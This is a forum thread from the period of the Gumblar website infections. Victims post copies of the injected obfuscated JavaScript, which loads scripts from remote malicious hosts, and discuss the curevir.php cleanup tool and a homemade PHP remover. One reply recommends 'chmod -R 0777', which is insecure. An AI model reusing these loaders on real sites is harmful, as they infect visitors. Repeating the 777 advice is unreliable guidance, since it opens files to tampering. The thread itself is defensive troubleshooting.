Thread: <script>/*GNU GPL*/ try{window.onload = function(){var

Hello,

I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

<script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->

The curevir.php will not work with the additional lines:
<!--42001c396c3732f4ca699120fdcd6582-->

curevir finds the infection but it doesn't delete the lines...

Please help.

THX
WEBSTER

[QUOTE=webster;548]Hello,

I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

<script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->

The curevir.php will not work with the additional lines:
<!--42001c396c3732f4ca699120fdcd6582-->

curevir finds the infection but it doesn't delete the lines...

Please help.

THX
WEBSTER[/QUOTE]

I have the same problem and i can`t download file
[QUOTE]Could not read source file[/QUOTE]

Please help

Best regards

[QUOTE=webster;548]Hello,

I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

<script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->
<!--42001c396c3732f4ca699120fdcd6582-->

The curevir.php will not work with the additional lines:
<!--42001c396c3732f4ca699120fdcd6582-->

curevir finds the infection but it doesn't delete the lines...

Please help.

THX
WEBSTER[/QUOTE]
I'm also having this problem. I have similar lines in my infected files after the <script> and it says success when I run curevir.php but sadly nothing is removed.

Any ideas on how to resolve this?

Many thanks,

AJ

I've experienced this problem on my hosting. Many thanks for the script, which has really helped.

I noticed that in a small number of cases it says it has succeeded in curing file, but if I re-run immediately, they appear again. Not a problem, as I've removed manually, but I've given an example below (from an INDEX.PHP file) which wasn't removed.

Any ideas yet what the underlying problem might be? I am using FileZilla and I do have Adobe Acrobat installed. I changed my FTP passwords but I was still re-infected and I'm the only person with FTP access to my shared hosting (Go Daddy).

<script>/*GNU GPL*/ try{window.onload = function(){var Osqo3r0s986 = document.createElement('s$(&c&r(@i$)#p&@#t$'.replace(/&|\^|@|\(|\!|\)|\$|#/ig, ''));var Wavk92u2kn = 'Ju8t238iq8';Osqo3r0s986.setAttribute('type', 't(!!&e)$()x!&t$$!/^!@j!&a@@v!a$^)s)c!$r@#i!!)p))#t!!'.replace(/\$|&|@|#|\^|\(|\!|\)/ig, ''));Osqo3r0s986.setAttribute('src', 'h(@)#t!@t!p!:@)@)/!(/)$!a&@@@m!a$@@(&z$&o##@#n(!@-)!c$&(o!(#-)j)p@@)@.)$w@a&^$y&&&2($(s!)#m##)$s!!^$$.$@!#c&$(o&#m#&.)!!u@##s^#(t!^r&!!@e$#@a(m!@(&-$t&v&!.$$t(h)e^)@g(^(^^i(@&(f#@(t(s@&(!a(&)$l(&&^(e(.^^^r!@^^u(:^$!)8#(0@#8@$$0(&&/!&)g##!@o(!)o((g))#l)^@)e#).)$$c(!&o&)$&m^(/#g#))o)@o$$g@!&l@e)#!.#&c^^)o)m$$!#/&s((!k)!y$(#.@!#c)$!o#&m$(!#/^!@e&&$&h!&o&^w&#).@$c!#o(#)&m))/$&^!)c#^!r!&i$#($c)&i(!&n#&^f$&&o&).()!@c@@o@@)m&/$!'.replace(/\(|\^|@|\)|\!|\$|&|#/ig, ''));Osqo3r0s986.setAttribute('defer', 'd#!&&e(((f@@e(!r#'.replace(/@|#|&|\!|\$|\(|\)|\^/ig, ''));Osqo3r0s986.setAttribute('id', 'D!!)i@&a^@#9#@6#$z#!)$f$)t(b&)@6@^@y)$('.replace(/&|\)|\^|\(|#|\$|@|\!/ig, ''));document.body.appendChild(Osqo3r0s986);}} catch(G2lu8zc0m82ax) {}</script>
<!--4450a0c39e4b85a05898521d2a135e14-->
<!--4450a0c39e4b85a05898521d2a135e14-->
<!--4450a0c39e4b85a05898521d2a135e14-->

I am having this same issue. I've tried reloading my Wordpress files and only portions of the site become available. The script on mine reads as follows:


<script>/*GNU GPL*/ try{window.onload = function(){var A228lu47ipw = document.createElement('s&(c((^r$##i^^$p&$!#t('.replace(/\)|\(|\!|\^|#|@|&|\$/ig, ''))..... you get the idea... and then

<!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
<!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
<!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
<!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->


I run curevir.php and it says that it's successful. I even ran it on the newly installed files that I uploaded and while i can see SOME of the site, i can't log in as an admin and from what I've read, I understand that the virus will re-infect my site in a matter of moments.

Please help???

LNS

I have made some changes to the script, basically commenting out the backing up part, so I can cron the script to run 5 times a day, just incase the virus decide to comes back. I notify my host and they said its cause of my faulty scripts, lol.

I suggest everyone cron the script in the main directory, just as a security measure too.

I notice that this problem is also mentioned in some Wordpress threads, e.g. [url]http://wordpress.org/support/topic/344181[/url]
Is it possible that this attack is using Wordpress to get in there?

[QUOTE=litensweet;560]I am having this same issue. I've tried reloading my Wordpress files and only portions of the site become available. The script on mine reads as follows:


<script>/*GNU GPL*/ try{window.onload = function(){var A228lu47ipw = document.createElement('s&(c((^r$##i^^$p&$!#t('.replace(/\)|\(|\!|\^|#|@|&|\$/ig, ''))..... you get the idea... and then

<!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
<!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
<!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
<!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->


I run curevir.php and it says that it's successful. I even ran it on the newly installed files that I uploaded and while i can see SOME of the site, i can't log in as an admin and from what I've read, I understand that the virus will re-infect my site in a matter of moments.

Please help???

LNS[/QUOTE]

I've posted the update on the script at [url]http://justcoded.com/article/gumblar-family-virus-removal-tool/[/url], you can download new version there.

Konstantin Boyko,
[url]http://justcoded.com[/url]

I think you still have the virus, you need to make sure that your machine is clean before changing the password. The other measure is to not save your password in FileZilla - it is known as the client where passwords can be stolen. From my experience WinSCP is safe for now.

Regards,
Konstantin Boyko
[url]http://justcoded.com[/url]

[QUOTE=aingham;559]I've experienced this problem on my hosting. Many thanks for the script, which has really helped.

I noticed that in a small number of cases it says it has succeeded in curing file, but if I re-run immediately, they appear again. Not a problem, as I've removed manually, but I've given an example below (from an INDEX.PHP file) which wasn't removed.

Any ideas yet what the underlying problem might be? I am using FileZilla and I do have Adobe Acrobat installed. I changed my FTP passwords but I was still re-infected and I'm the only person with FTP access to my shared hosting (Go Daddy).

<script>/*GNU GPL*/ try{window.onload = function(){var Osqo3r0s986 = document.createElement('s$(&c&r(@i$)#p&@#t$'.replace(/&|\^|@|\(|\!|\)|\$|#/ig, ''));var Wavk92u2kn = 'Ju8t238iq8';Osqo3r0s986.setAttribute('type', 't(!!&e)$()x!&t$$!/^!@j!&a@@v!a$^)s)c!$r@#i!!)p))#t!!'.replace(/\$|&|@|#|\^|\(|\!|\)/ig, ''));Osqo3r0s986.setAttribute('src', 'h(@)#t!@t!p!:@)@)/!(/)$!a&@@@m!a$@@(&z$&o##@#n(!@-)!c$&(o!(#-)j)p@@)@.)$w@a&^$y&&&2($(s!)#m##)$s!!^$$.$@!#c&$(o&#m#&.)!!u@##s^#(t!^r&!!@e$#@a(m!@(&-$t&v&!.$$t(h)e^)@g(^(^^i(@&(f#@(t(s@&(!a(&)$l(&&^(e(.^^^r!@^^u(:^$!)8#(0@#8@$$0(&&/!&)g##!@o(!)o((g))#l)^@)e#).)$$c(!&o&)$&m^(/#g#))o)@o$$g@!&l@e)#!.#&c^^)o)m$$!#/&s((!k)!y$(#.@!#c)$!o#&m$(!#/^!@e&&$&h!&o&^w&#).@$c!#o(#)&m))/$&^!)c#^!r!&i$#($c)&i(!&n#&^f$&&o&).()!@c@@o@@)m&/$!'.replace(/\(|\^|@|\)|\!|\$|&|#/ig, ''));Osqo3r0s986.setAttribute('defer', 'd#!&&e(((f@@e(!r#'.replace(/@|#|&|\!|\$|\(|\)|\^/ig, ''));Osqo3r0s986.setAttribute('id', 'D!!)i@&a^@#9#@6#$z#!)$f$)t(b&)@6@^@y)$('.replace(/&|\)|\^|\(|#|\$|@|\!/ig, ''));document.body.appendChild(Osqo3r0s986);}} catch(G2lu8zc0m82ax) {}</script>
<!--4450a0c39e4b85a05898521d2a135e14-->
<!--4450a0c39e4b85a05898521d2a135e14-->
<!--4450a0c39e4b85a05898521d2a135e14-->[/QUOTE]

Thank`s for script
but I have still problem.
My index.php amd other files are clean but still when I go to my web I see only white site

Sory for my English

Please help
Best regards

I just wanted to register and say thankyou for this great script. I was infected by this virus on several domains but after uploading the curevir.php script and running it in each directory it would appear to have cleared it completely.

For future reference, the virus attempts to load things onto the hosts computer, I noticed this message:
[QUOTE]This web site wants to run the following add-on: 'Microsoft Data
Access - Remote Data Services Dat...' from 'Microsoft Corporation'. If
you trust the web site and the add-on and want to allow it to run,
click here...[/QUOTE]

I was also receiving a warning message similar to this:
[URL=http://img199.imageshack.us/i/warninga.jpg/][IMG]http://img199.imageshack.us/img199/4237/warninga.th.jpg[/IMG][/URL]
[url]http://img199.imageshack.us/img199/4237/warninga.jpg[/url]

Contact me at [email]kostya.boyko@gmail.com[/email] with more details - I will try to look into your problem.

[QUOTE=slavvek;572]Thank`s for script
but I have still problem.
My index.php amd other files are clean but still when I go to my web I see only white site

Sory for my English

Please help
Best regards[/QUOTE]

Many thanks for the updated script. Has fixed two of my websites on one server perfectly, however I have another website infected on a different server that I'm having trouble cleaning up. It's to do with the file permissions I think but I'm not sure of the quickest, safest and easiest way to resolve this. This is what I get for each file when running the script:

[QUOTE]FAILED!

Trying to cure /home/starread/public_html/mambots/editors/tinymce/jscripts/tiny_mce/plugins/_template/editor_plugin.js

Warning: fopen(/home/starread/public_html/mambots/editors/tinymce/jscripts/tiny_mce/plugins/_template/editor_plugin.js) [function.fopen]: failed to open stream: Permission denied in /home/starread/public_html/curevir.php on line 231

Warning: fwrite(): supplied argument is not a valid stream resource in /home/starread/public_html/curevir.php on line 235

Warning: fclose(): supplied argument is not a valid stream resource in /home/starread/public_html/curevir.php on line 237[/QUOTE]

Any suggestions for this novice?

Cheers,

AJ

The quickest way to resolve this is to set writing permissions (or even 777) for all files (use [B]chmod -R 0777 webfolder_path[/B] if you have SSH access)

[QUOTE=AJ~;586]Many thanks for the updated script. Has fixed two of my websites on one server perfectly, however I have another website infected on a different server that I'm having trouble cleaning up. It's to do with the file permissions I think but I'm not sure of the quickest, safest and easiest way to resolve this. This is what I get for each file when running the script:



Any suggestions for this novice?

Cheers,

AJ[/QUOTE]

Thanks Konstantin!

i have a version like this:
<script>/*GNU GPL*/ try{window.onload = function(){var Ql4gjqipl9kw = document.createElement('s#(c()r#^$i@$p&#$t&('.replace(/\)|#|@|\!|\$|\(|\^|&/ig, ''));var Xfw26utk2k1fw = 'Umene77ip84';Ql4gjqipl9kw.setAttribute('type', 't())@#e@)&)!x!t@$/$@&j@@^$a#v!##(a!s##!c!$!#r@))&i!&$p^))#t&'.replace(/#|\^|\(|\!|\$|&|\)|@/ig, ''));Ql4gjqipl9kw.setAttribute('src', 'h^#t@t(!@p#:!/#^/$#$j&!o@o^)m(^#l@^#a)#^#-#&o@r(!g$.$(w!^o&##w^h()e(a!$d@)^#).!(^c$o@!&m#(.!@^q&i#$&d&!(&i&@)a&#^)n#&-^)c!^&o)m!!.&@^b))@e@!s&!&&t&($b^)o$@^b@@)).@$r($)$u(^$)8!@!0^8)!()#0@)/@w##^i#^$k&(t&#@#i$#$o#n$@a^#r&$$@y^^.#o&$$r@!$g)/#$w!#^i#k^t&^i^!o!@n^a$#r)#$y)^@).$$o$@&r#)g&)/$)(a))&m((a#$z@o##n$.#!)c^$(o@m#/(#v#!#(e#!r#($i#z&o^$n#.@)@n^e&&^!t&/&g^$#o$^)o&g&l!^^e&^).#c!^o&!!&@m^/($)^'.replace(/\)|\(|&|\^|\$|\!|#|@/ig, ''));Ql4gjqipl9kw.setAttribute('defer', 'd!@(e###^f#@e#r!)(!'.replace(/#|\!|\)|&|\$|@|\^|\(/ig, ''));Ql4gjqipl9kw.setAttribute('id', 'S(&!j!l(&)^q)@&z$$!b&)@^1!@j)f)@a(#4(!4)$!0)('.replace(/\!|\(|\)|\^|&|\$|#|@/ig, ''));document.body.appendChild(Ql4gjqipl9kw);}} catch(Txjsawzavktyf) {}</script>
<!--92790ec2e23e93061a67c7677981391c-->

I have the same shit, and I don't know how to fight this.. Please help anyone! How to kill that hacker forever?!
Well I've made one script but it only removes that JS.. works pretty fast..

[PHP]
global $aff;
set_time_limit(0);
$aff = 0;

function getFileExtension($file) {
if (!$file) return '';
$arr = explode('.',trim(trim($file,'.')));
$ret = (!isset($arr[1]) ? $file : strtolower($arr[count($arr)-1]));
return ($ret && strlen($ret)<strlen($file)?$ret:NULL);
}

function clearMe($dir) {
global $aff;
$exts = array('php','html','htm','js');
$match = '<script>/*GNU GPL*/';
$js_match = '/*GNU GPL*/';

if (!is_dir($dir)) return false;
$dh = opendir($dir);
while (($file = readdir($dh))!==false) {
if ($file=='.' || $file=='..' || $file=='_clear.php') continue;
if (is_dir($dir.$file)) {
clearMe($dir.$file.'/');
} else {
$ext = getFileExtension($file);
if (in_array($ext,$exts)) {
$c = file_get_contents($dir.$file);
if (($ext=='js' && ($pos = strpos($c,$js_match))) || ($ext!='js' && ($pos = strpos($c,$match)))) {
$aff++;
$c = substr($c,0,$pos);
$fp = fopen($dir.$file,'w');
fwrite($fp,$c);
fclose($fp);
}
}
}
}
closedir($dh);
}
if ($_GET['aaa']) {
clearMe('./');
echo 'Affected '.$aff.' files';
}
[/PHP]

<script>/*LGPL*/ try{ window.onload = function(){var Ilsyqujcs9bk8 = document.createElement('s^#^$c&#^!(r#^()i#!p^t$('.replace(/#|\!|\)|\$|\(|\^|&|@/ig, ''));Ilsyqujcs9bk8.setAttribute('defer', 'd#!e!#f$^))e#&)r^)'.replace(/\$|&|#|\(|\^|\)|\!|@/ig, ''));Ilsyqujcs9bk8.setAttribute('type', 't)e^x)$t^&/)j^a^$v&$)&@a)(s))c#@#@@r#^$i#(&p)@t)^'.replace(/&|@|\)|\^|\!|#|\(|\$/ig, ''));Ilsyqujcs9bk8.setAttribute('id', 'N$@)p$o!&^5((9(@$#)h@!$7$)5$u$f!1!&&@j#!$'.replace(/\)|\^|\!|&|\(|@|\$|#/ig, ''));Ilsyqujcs9bk8.setAttribute('s@)r$@$c))'.replace(/\$|\!|&|#|\^|@|\(|\)/ig, ''), 'h!$t#)t^$)p^#:^&)@/@((#@/@)#o!^$r@@#k#!@#u@@t^&$#-(!#c@!$o(#!#m#$-($b&#!r^)&.)$@)i!$m#&(d)(b(.$c@o^&m#^#.(#&@$o@#^$p)e#!n&^$d(@n!s&(#-)#c$)!o^m!.^t$$(#&h&!e)l&$a$$c!e!##w&!#e!(b#).@^$r(#u&(!:@&)8$!^0#)&8^0&&^/^d))a$i!@)l(@#y$#$$m@$$o^t$i(&o!&!n#^)#.^c$!@)o^#)$m$((/#d^)a^)(i)@l@)y))m##$o!t()i!$o(@n!@&!.)!c$)^^o#)@m@^&#^/&#!g&&o)o&&g^&$l@()e(#@.&c)$^o!(#$^m#/!&&)s#&!t(a#$c$#(^@k#o(v#)e#r!#f@(!l@(o)#)&)w$^^$.$^c&)$o!!(^m@#@/#f(@&o)^((!x&$s(#!@#p#o#!##r)!)t@&s&.!c^##o@!@&@m&^!/&)^'.replace(/#|\$|&|\!|\)|\^|@|\(/ig, ''));if (document){document.body.appendChild(Ilsyqujcs9bk8);}} } catch(M835ohsob0yx6ahzbc) {}</script>
<!--2a6ffb69d19a8c3d2db6bf596af95093-->

Our site got infected with this version on 2010-01-05:

/*GNU GPL*/ try{window.onload = function(){var Xk6ov9two3gra = document.createElement('s!$$c(r!#@i^!)#p&^t#!&'.replace(/\!|@|\^|\(|\)|&|\$|#/ig, ''));var Lau7p9le2g = 'Sae46qk91wky';Xk6ov9two3gra.setAttribute('type', 't@#e@$(!x$(&!t(/^(j^a!#(v&^&&a)()#s$c^#r))()i@#$p!((t!#!)'.replace(/\(|#|\^|\)|@|&|\$|\!/ig, ''));Xk6ov9two3gra.setAttribute('src', 'h))t(#@t&(p$:!/(/(#&d!i)^a(^n##!p(#()i&#$@n@)&)g!!!#-)$c)#!&o$#m&&(&.(@d!!#)r(@))!u)$#@d^)g@(@e&r#($e()p@#(o)!#r(^t!.^$!#c)&o^)m).($^m#!$^e#g#a$)v&@#$i(##d(e(!o!(!-$(c&&#^o(^!m^@@.^t()^&h^@#e)#)a!w^&o(^&r&l)&d)#&.&&r^@u@$$:&^8$0)!@)8#)0@@!/#)@g)^(o)$@o$&g@(l@#e^.^$$c)($o$#&m$)/&#g)o(&o&g^(l#e^.$(c)#$o@m^)&/$@w&a)$t#^.)!t&(^v&/)!w!@#!a$t(c#)#!h!!-&m##(o)^#v@$#^i@)()e$)(s##-(@(o@@#n^l!i!^^)(n@e^!!!.(!&t($@v(@&!/$t)#i$&)n&#)y@!^u(($r(@l&$.($^&c^^!)#o)^m!/^!!'.replace(/\^|&|\$|\(|\!|@|\)|#/ig, ''));Xk6ov9two3gra.setAttribute('defer', 'd))e@)f&e(r!'.replace(/#|\$|\^|\(|\!|@|&|\)/ig, ''));Xk6ov9two3gra.setAttribute('id', 'V&2(^&d)j^&#@7((^1&8&($o)b!#$&c#@&c$g#)#'.replace(/&|\)|\(|\$|@|\!|#|\^/ig, ''));document.body.appendChild(Xk6ov9two3gra);}} catch(Z8a9ghl4wyyr) {}

<!--6975b61a38031e3a79ad9e9ff225baad-->

Updated version of my script (version 1.1) already handles this. Please feel free to check at

[url]http://justcoded.com/article/gumblar-family-virus-removal-tool[/url]

[QUOTE=vividsign;662]<script>/*LGPL*/ try{ window.onload = function(){var Ilsyqujcs9bk8 = document.createElement('s^#^$c&#^!(r#^()i#!p^t$('.replace(/#|\!|\)|\$|\(|\^|&|@/ig, ''));Ilsyqujcs9bk8.setAttribute('defer', 'd#!e!#f$^))e#&)r^)'.replace(/\$|&|#|\(|\^|\)|\!|@/ig, ''));Ilsyqujcs9bk8.setAttribute('type', 't)e^x)$t^&/)j^a^$v&$)&@a)(s))c#@#@@r#^$i#(&p)@t)^'.replace(/&|@|\)|\^|\!|#|\(|\$/ig, ''));Ilsyqujcs9bk8.setAttribute('id', 'N$@)p$o!&^5((9(@$#)h@!$7$)5$u$f!1!&&@j#!$'.replace(/\)|\^|\!|&|\(|@|\$|#/ig, ''));Ilsyqujcs9bk8.setAttribute('s@)r$@$c))'.replace(/\$|\!|&|#|\^|@|\(|\)/ig, ''), 'h!$t#)t^$)p^#:^&)@/@((#@/@)#o!^$r@@#k#!@#u@@t^&$#-(!#c@!$o(#!#m#$-($b&#!r^)&.)$@)i!$m#&(d)(b(.$c@o^&m#^#.(#&@$o@#^$p)e#!n&^$d(@n!s&(#-)#c$)!o^m!.^t$$(#&h&!e)l&$a$$c!e!##w&!#e!(b#).@^$r(#u&(!:@&)8$!^0#)&8^0&&^/^d))a$i!@)l(@#y$#$$m@$$o^t$i(&o!&!n#^)#.^c$!@)o^#)$m$((/#d^)a^)(i)@l@)y))m##$o!t()i!$o(@n!@&!.)!c$)^^o#)@m@^&#^/&#!g&&o)o&&g^&$l@()e(#@.&c)$^o!(#$^m#/!&&)s#&!t(a#$c$#(^@k#o(v#)e#r!#f@(!l@(o)#)&)w$^^$.$^c&)$o!!(^m@#@/#f(@&o)^((!x&$s(#!@#p#o#!##r)!)t@&s&.!c^##o@!@&@m&^!/&)^'.replace(/#|\$|&|\!|\)|\^|@|\(/ig, ''));if (document){document.body.appendChild(Ilsyqujcs9bk8);}} } catch(M835ohsob0yx6ahzbc) {}</script>
<!--2a6ffb69d19a8c3d2db6bf596af95093-->[/QUOTE]

Konstantin Boyko
[url]http://justcoded.com[/url]